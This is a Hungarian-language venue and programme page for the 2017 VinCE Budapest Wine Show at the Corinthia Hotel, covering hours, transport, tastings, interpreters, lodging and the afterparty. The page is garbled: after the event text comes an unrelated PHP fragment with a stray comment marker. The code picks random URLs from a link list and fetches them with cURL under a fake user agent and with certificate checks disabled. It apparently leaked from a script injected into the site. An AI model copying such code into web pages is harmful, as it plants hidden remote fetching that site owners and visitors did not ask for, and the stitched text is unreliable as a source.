-->

Helyszín


Ötcsillagos helyszín – mi minden négyzetmétert betöltünk!

A helyszín – ahogy az előző hét alkalommal – a Corinthia Hotel Budapest. Az ötcsillagos belvárosi hotel első emeleti rendezvénytermeiből a VinCE Budapest Wine Show az összes termet betölti!
A regisztráció a földszinten történik, a hotel főbejáratától 30 méterre jobbra. A regisztrációs csarnoknak külön bejárata van.

Nyitvatartás:

2017. március 17. péntek, nyitvatartás 11-21 óráig
2017. március 18. szombat nyitvatartás 11-21 óráig
2017.március 19. vasárnap, nyitvatartás 11-18 óráig

underline

venue map v1

underline

forgóajtó

Könnyű megközelíthetőség

A Corinthia Hotel Budapest épülete az Erzsébet körúton található (VII. kerület, Erzsébet krt 43–47.)
Megközelíthető
– villamossal: a 4-es és 6-os villamosok Király utcai megállójától pár lépés
– metróval: a 2-es metró Blaha Lujza téri megállójától 10 perc séta, az 1-es metró Oktogon megállójától ugyancsak 10 perc séta
Térkép

underline

Mesterkurzus – a mesés bálteremben 200 fő ülhet le egyszerre

A VinCE legnagyobb érdeklődésre számot tartó ültetett kóstolói, a mesterkurzusok a Corinthia Hotel Budapest báltermében kapnak helyet. Egyszerre 200 fő tud leülni, mindenki az asztalon 6-8, esetleg 10, sőt arra is volt már példa, hogy 12 pohár sorakozott. Ásványvizet, tollat, kóstolólapot, borsort természetesen biztosítunk. A mesterkurzusokat február elején tesszük közzé. A mesterkurzusok ára 2–10000 Ft /fő, de elengedhetetlen hozzá a választott mesterkurzus napjára szóló napijegy.

mesterkurzus

underline

Workshop – interaktív kóstolók, ahol mindenki véleménye fontos

A lépcsőn felérve jobbra kell fordulni, át az I. csarnokon, majd keresztül a hídon és a II. csarnok baloldali részén találjuk a workshoptermet, ahol 100 fős, közvetlenebb hangulatú ültetett kóstolók zajlanak. Ásványvizet, tollat, kóstolólapot, borsort természetesen itt is biztosítunk. A workshopokat február elején tesszük közzé. A workshopok ára 2–5000 Ft /fő, de elengedhetetlen hozzá a választott workshop napjára szóló napijegy.

workshop

underline

Angolul vagy magyarra fordítva – tolmácsot biztosítunk!

Mesterkurzusainkon és workshopjainkon az előadók többnyire angolul tartják előadásaikat. A kivetítőn látható prezentációk segítik a megértést, de mindkét teremben szinkrontolmácsot is biztosítunk, tehát a fejhallgatókon magyarul is követhetjük az előadót. Ha az előadó más nyelven ad elő (például olaszul, franciául, portugálul), tolmácsot ekkor is biztosítunk. Az előadás nyelvét mindig jelöljük.

tolmács

underline

VinCE Bár – a tanulás leglazább módja

A VinCE Budapest egyik legnépszerűbb programja rendszerint a VinCE Bár, itt ugyanis egészen kötetlenül, bárszékeken ülve, könyöklők köré telepedve hallgathatunk röpke (40-45 perces), prezentációkat, persze általában kóstolhatunk is mellé. Itt az előadások magyar nyelven hangzanak el, ha mégis külföldi az előadó, akkor követő tolmácsot biztosítunk.Ha az előadó más nyelven ad elő (például olaszul, franciául, portugálul), tolmácsot ekkor is biztosítunk. Az előadás nyelvét mindig jelöljük.

VinCE Bár

underline

Szállás a legjobb helyen

A legideálisabb szállás a VinCE Budapest Wine Show vendégeinek természetesen magában a házban van, hiszen este nem kell messzire menni, reggel sem kell messzire menni, a reggeli pazar, a spa fejedelmi. A VinCE Budapest vendégei speciális kedvezményt kapnak a hoteltől, ennek részleteit hamarosan közreadjuk.

Corinthia-spa

 

underline

Food court – étkezés lehetőség a VinCE Budapest Wine Show-n belül

A VinCE vendégei karszalagjukkal elhagyhatját a rendezvényt és vissza is térhetnek, ha másutt szeretnének ebédelni, de maga a VinCE is számos étkezési lehetőséget biztosít. Gourmet-kiállítóink minőségi, ízletes finomságokat kínálnak, és természetesen desszertet és kávét is találnak vendégeink kiállítóink portékái között.

sonkamester
chez dodo

underline

Afterparty

A kóstolás 20 órakor véget ér, aki azonban a sok kóstolt bor élményével végre önfeledten fogyasztani is szeretne, annak javasoljuk a VinCE Afterparty-t, amelyre valamelyik, a Corinthia Hotel Budapest épületétől pár lépésre található budapesti szórakozóhelyen kerül sor. Ha szeretne együtt lazulni a borászokkal, akik legalább olyan merészek a táncparketten, mint a hordók között, akkor ott a helye! Részletek február elején várhatók!

underline


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>